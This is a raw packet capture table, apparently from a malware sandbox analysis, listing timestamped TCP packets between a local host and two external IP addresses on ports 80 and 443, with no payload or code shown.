                                                                                                                                      Oct 5, 2024 14:52:49.836560965 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836566925 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836601019 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836612940 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836633921 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836644888 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836678028 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836684942 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836718082 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836729050 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836750984 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836760044 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836785078 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836798906 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836819887 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836828947 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836852074 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836863995 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836886883 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836896896 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836920023 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836949110 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836952925 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836961985 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.836992025 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.836992979 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.837035894 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.839967012 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.854590893 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.854621887 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.854657888 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.854671001 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.854702950 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.854715109 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.854715109 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.854748011 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902560949 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902616024 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902638912 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902646065 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902662992 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902689934 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902700901 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902746916 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902750015 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902795076 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902801037 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902833939 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902851105 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902869940 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902884007 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902901888 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902916908 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902935028 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902951956 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.902967930 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.902977943 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903002977 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903011084 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903036118 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903050900 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903085947 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903089046 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903134108 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903140068 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903173923 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903192043 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903203964 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903218985 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903248072 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903254032 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903291941 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903301001 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903341055 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903343916 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903383017 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903419018 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903455019 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903471947 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903490067 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903496981 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903522015 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903537035 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903557062 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903569937 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903589010 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903604984 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903621912 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903634071 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903655052 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903667927 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903687954 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903701067 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903721094 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903738022 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903753042 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903763056 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903785944 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903795958 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903820038 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903834105 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903853893 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903867006 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903887033 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903903008 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903920889 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903928995 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903955936 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.903966904 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.903992891 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904004097 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904026031 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904036999 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904057980 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904073954 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904092073 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904099941 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904126883 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904136896 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904175043 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904278040 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904310942 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904330015 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904354095 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904361963 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904393911 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904408932 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904428005 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904444933 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904462099 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904472113 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904508114 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904515982 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904548883 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904565096 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904582977 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904598951 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904625893 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904633045 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904665947 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904680014 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904701948 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904711962 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904740095 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904756069 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904772997 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904782057 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904807091 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904818058 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904839993 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904855013 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904872894 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904881001 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904906034 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904918909 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904939890 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904954910 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.904973030 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.904989004 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905011892 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905023098 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905056953 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905064106 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905097961 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905112028 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905131102 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905145884 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905179977 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905184984 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905230999 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905236959 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905286074 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905291080 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905323029 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905355930 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905388117 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905390024 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905412912 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905412912 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905420065 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905437946 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905452967 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905467033 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905487061 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905504942 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905519962 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905535936 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905553102 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905566931 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905586004 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905599117 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905618906 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905635118 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905653000 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905668020 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905685902 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905699968 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905719995 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905735016 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905752897 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905771017 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905785084 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905797958 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905826092 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905838966 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905870914 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905900955 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905905008 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905908108 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905936956 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905956030 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.905977964 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.905982018 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906011105 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906019926 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906044006 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906059027 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906075954 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906085968 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906110048 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906124115 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906141996 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906156063 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906177998 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906233072 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906266928 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.906284094 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.906317949 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.909750938 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.909802914 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.909810066 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.909847021 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.911072016 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.911134958 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.911135912 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.911169052 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.911187887 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.911205053 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.911212921 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.911250114 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.911782026 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.911885977 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.911935091 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.911987066 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.945101976 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.945152044 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.945180893 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.945185900 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.945199966 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.945219040 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.945230007 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.945251942 CEST8049161107.172.130.147192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:49.945262909 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:49.945295095 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:50.487274885 CEST4916180192.168.2.22107.172.130.147
                                                                                                                                      Oct 5, 2024 14:52:53.911856890 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:53.911909103 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:53.911959887 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:53.916682005 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:53.916693926 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.407262087 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.407345057 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.414515972 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.414552927 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.414882898 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.470531940 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.515403032 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688290119 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688431025 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688472986 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688509941 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688548088 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688585997 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.688642025 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.688642025 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.688664913 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.689390898 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.689450026 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.689451933 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.689471006 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.689830065 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.689840078 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.692553043 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.692605972 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.693176985 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.780831099 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.780903101 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.780946016 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.780983925 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.780999899 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.781013012 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.781049013 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.781378984 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.781476021 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.781517029 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.781553030 CEST49162443192.168.2.22185.199.109.133
                                                                                                                                      Oct 5, 2024 14:52:54.781559944 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.782241106 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.782293081 CEST44349162185.199.109.133192.168.2.22
                                                                                                                                      Oct 5, 2024 14:52:54.782327890 CEST49162443192.168.2.22185.199.109.133
